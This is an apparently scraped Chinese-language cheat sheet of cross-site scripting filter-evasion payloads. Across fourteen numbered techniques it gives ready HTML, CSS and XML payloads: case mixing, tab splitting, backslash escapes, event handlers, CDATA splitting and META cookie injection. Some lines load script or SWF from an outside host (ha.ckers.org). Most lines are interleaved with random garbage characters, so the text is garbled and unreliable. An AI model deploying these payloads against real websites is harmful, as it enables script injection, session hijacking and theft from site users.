1. 改变字符大小写. O( c( R$ k1 {; a4 f
8 d$ U' C/ D- T3 ^
6 z, p, G$ v: k6 V% B2 A
! f/ p2 J; L o/ |' q8 v+ g <sCript>alert(‘d’)</scRipT> b/ _4 Q! v! H% f5 X
! P: h, F# }& w; D4 U2. 利用多加一些其它字符来规避Regular Expression的检查
' w+ g& t ]) E, w) C; s( y' n
) q* n. u/ N0 p& H! P! U" ^ <<script>alert(‘c’)//<</script>
( m# X% V& Y' k# s. l6 Z9 {! @' v+ c0 ^- D, b; u- q
<SCRIPT a=">" SRC="t.js"></SCRIPT> d- h' @0 X( u9 E4 ?
$ A9 w* r' b% Y# |
<SCRIPT =">" SRC="t.js"></SCRIPT>! v: U- `) w3 y& ^0 v
/ n( @# |; L8 e% k7 T
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>4 V5 }" d% a/ c' f( r. n9 G( V, t
* X+ l7 k5 Q9 y0 [7 X3 ~3 G9 Y
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
+ W1 H' O: n4 @1 u, Q
- a6 j( o, h, [ <SCRIPT a=`>` SRC="t.js"></SCRIPT>8 j- b8 S' H2 z. U- d5 K
! z* l0 ]- a/ G5 h/ ] <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
0 ^0 k& o) g Q4 X' `' r; ^. E$ u5 s( w" u: U# A# O
3. 以其它扩展名取代.js9 k! e; c' B: x- C) D
8 u' @+ P* j# v, B) O( l! N$ o
<script src="bad.jpg"></script>
F* t) p0 z9 |1 b& k( Q
: p: G+ {; a- {( R- w$ G4. 将Javascript写在CSS档里
( Y% b4 ^7 I2 e3 G0 V. O U
& A! S0 Z1 U2 ` <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">- u0 U. ?( }$ ^' p& z! |
7 f: B, U/ n W8 p0 X& S( q! j example:
. d6 Z7 {5 Z7 Y2 ]$ T' E3 V; p6 ]. x
body {
( r0 U3 N/ l9 G5 _ C+ a" e5 }# |6 L5 e7 a4 J4 D, m" U6 V, L) S4 ?
background-image: url(‘javascript:alert("XSS");’)/ s( Q2 u* S1 |5 N' f
5 T- H( _: B( l$ w
}
" O' L/ R1 B: K8 F* |& @, y$ w( q. K$ x2 H- J* Y4 c5 f
5. 在script的tag里加入一些其它字符
9 s7 i/ N: r$ i- M" }7 b. U( z
<SCRIPT/SRC="t.js"></SCRIPT>- j* n. D P: e% x# j# O! e
7 B q" |; f& q" B! W <SCRIPT/anyword SRC="t.js"></SCRIPT>
" C; O! I2 p2 l6 x3 z7 R+ `# c5 ^
+ G* R& m/ U3 x' q) c$ U6. 使用tab或是new line来规避/ s/ t6 v+ d G o8 k9 I8 q
" t8 y* w0 k6 x
<img src="jav ascr ipt:alert(‘XSS3′)">9 E2 L: A8 `% w
% ^! a; v; j% E. A- P <img src="jav ascr ipt:alert(‘XSS3′)">
9 ^9 A2 P' S- G! z( F" A$ Q# f
3 b+ P" u# p2 ~9 w S <IMG SRC="jav ascript:alert(‘XSS’);">
. w5 @0 ^* V$ B' E. `( G8 ]' v% c* {+ h, c# X9 k4 C
-> tag' x! a, C# E ?$ t) C
! Y9 N% J' \2 q: C' |" U -> new line8 Q. d# c0 k" P* {. z. i: ^- E n4 X
6 [' I5 O6 J _
7. 使用"\"来规避: \2 L* z: S9 X
9 N! B5 S5 g% d: ^7 W" r
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>; I1 e4 I& i$ G5 s: M
6 \8 B: ?) T$ t- Z$ s
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
4 ?4 V+ I+ Z$ Z- L8 D
3 Q8 n1 I4 X" j7 K. o <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
X, _& d' y9 }( j+ x7 m& l1 K9 t; }# @" F- c
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">' X4 H8 N( a% Q I
7 K7 R$ J: c! H; }+ P <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
% g* _: w. w% m1 N
3 n, H* L! F& O# U8. 使用Hex encode来规避(也可能会把";"拿掉)/ W6 M8 {$ y6 {4 [6 q
! f( m; }- T) W& k+ }/ F7 l; L <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));"># p8 f. j) ^( @& B% j& J
) l! C8 w: U0 z8 K6 t( M 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
8 d% ~( V) R6 H/ D, o/ s" ^. u! z2 v r/ m% E
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">4 w8 `7 [ Z5 t: p: C
7 C" r, m% U# ?& i5 g1 i. [* d
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">6 M3 S' d4 ]% j S" U! B$ d
. m$ j+ m( b9 f( s( \" V! u9. script in HTML tag
' j& Z( G; f9 P6 W1 I( Z, A# A1 J* z5 z7 j$ i
<body onload=」alert(‘onload’)」>( w+ j) Y' T7 g
+ j# G" t& G. k
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload5 Q" A6 [, j3 Y% i* A$ p
}" J0 b. w+ Y, H. S7 H10. 在swf里含有xss的code
" t5 l3 t% n+ i1 m% i
3 q5 q. }* n5 I3 j- R+ P5 c <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
4 i4 [4 H! n8 W9 v7 ]0 L* Q6 i
$ |& \- y* F2 V3 R* D11. 利用CDATA将xss的code拆开,再组合起来。/ X1 _8 E8 ~' e8 Y' P% |' B
! i' j, p7 @. n' }& Z* P. ^1 f7 D <XML ID=I><X><C>
. F2 ]2 ^) u0 R) `! {7 ~" ~+ g9 Z8 e( ~% g2 p# B& G; f
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>4 ^8 G0 Y; a" l) k# K; ]
& b8 T7 o) z! u5 m$ E! b8 n
</C></X>. N* |( w1 B2 y$ ~* y, i+ M
2 {: q# |$ l9 y! h' F* P+ e4 |/ I' y- K </xml>
$ k: _ U" ^6 m* W! a K+ ~ K0 A* r! c3 M" F
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
) p: Q9 m5 P' J: ~: ^ y
U! ^) Z& U: s) X: Z <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>+ t& b$ Z& k7 L U3 \
P( k8 A( \0 I2 T# r <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
9 e+ B( l8 v0 ]' [+ t+ N
" e9 q, z/ d/ J% x# Y12. 利用HTML+TIME。
) N5 x4 I" H, o8 O
! _- H( H/ |, f. N# U8 {1 d) v& W7 v5 a <HTML><BODY>
5 A0 Z! n) O: [( q7 W6 ]
P7 B; X# l' i, l& Y <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">- R4 Q4 W/ ]0 t' I; J& z& G
7 D$ B$ A! E/ b6 _ o
<?import namespace="t" implementation="#default#time2">
5 [' e$ @6 e# K# p
) b. L+ P1 v' }/ l+ h1 o2 K <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">+ ~: _' I5 g! I" d. [9 S2 J
1 M( g. D: _3 O2 ]+ F; n M& R
</BODY></HTML>* ^% }0 N9 ]3 M+ x
: H, P! Q" n6 j# J
13. 透过META写入Cookie。: O6 ?8 c3 b4 I& Y N/ R! i. \" B0 s
5 ?9 u! @+ u- F$ h# h* X0 q3 W <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
4 l- i7 B3 C1 C8 j; e
8 X+ U: B* ~5 P' d14. javascript in src , href , url
: @* E: G9 N- u0 O- X: k
( U2 z' Y# `; S! E, ] <IFRAME SRC=javascript:alert(’13′)></IFRAME>
$ @+ b; I& l9 y: X! E/ n- ~) U g: z8 R
<img src="javascript:alert(‘XSS3′)">, L. K0 r8 W! E0 p
& c) h# _( ~( ?, d( {" c
<IMG DYNSRC="javascript:alert(‘XSS20′)">
5 ]5 g% s0 i6 j3 k0 `# G4 A
) ?' `8 u) u) E/ B! N <IMG LOWSRC="javascript:alert(‘XSS21′)">1 P" b: i4 l( C" A: o3 s. g
& z* Z$ }" R6 b2 s3 o% [ h* b <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">" |6 ^0 ?7 S1 R! s2 \
, O( e* V) g+ O; I, Y% R
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
7 C# P$ |8 q& I. Q6 L7 B$ _+ |2 a- K8 ?5 V4 |" G5 Y
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
4 ^4 X. |0 m( L; w V+ v6 [6 _3 e6 `. ^+ u$ X% Z, {/ b
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
& K' V, ~# L z7 j) C" z
9 G; k( I9 ]$ y <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
$ w1 f8 L6 {8 e2 f% c5 J, S: a' `) g4 h) N
</STYLE><A CLASS=XSS></A>
% r% \8 M) x, X/ T8 j
3 x- Y8 ~* W4 O. d, }$ A) M% e1 h <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>$ I' I) s7 v. f
/ ?5 R3 j* E- \ |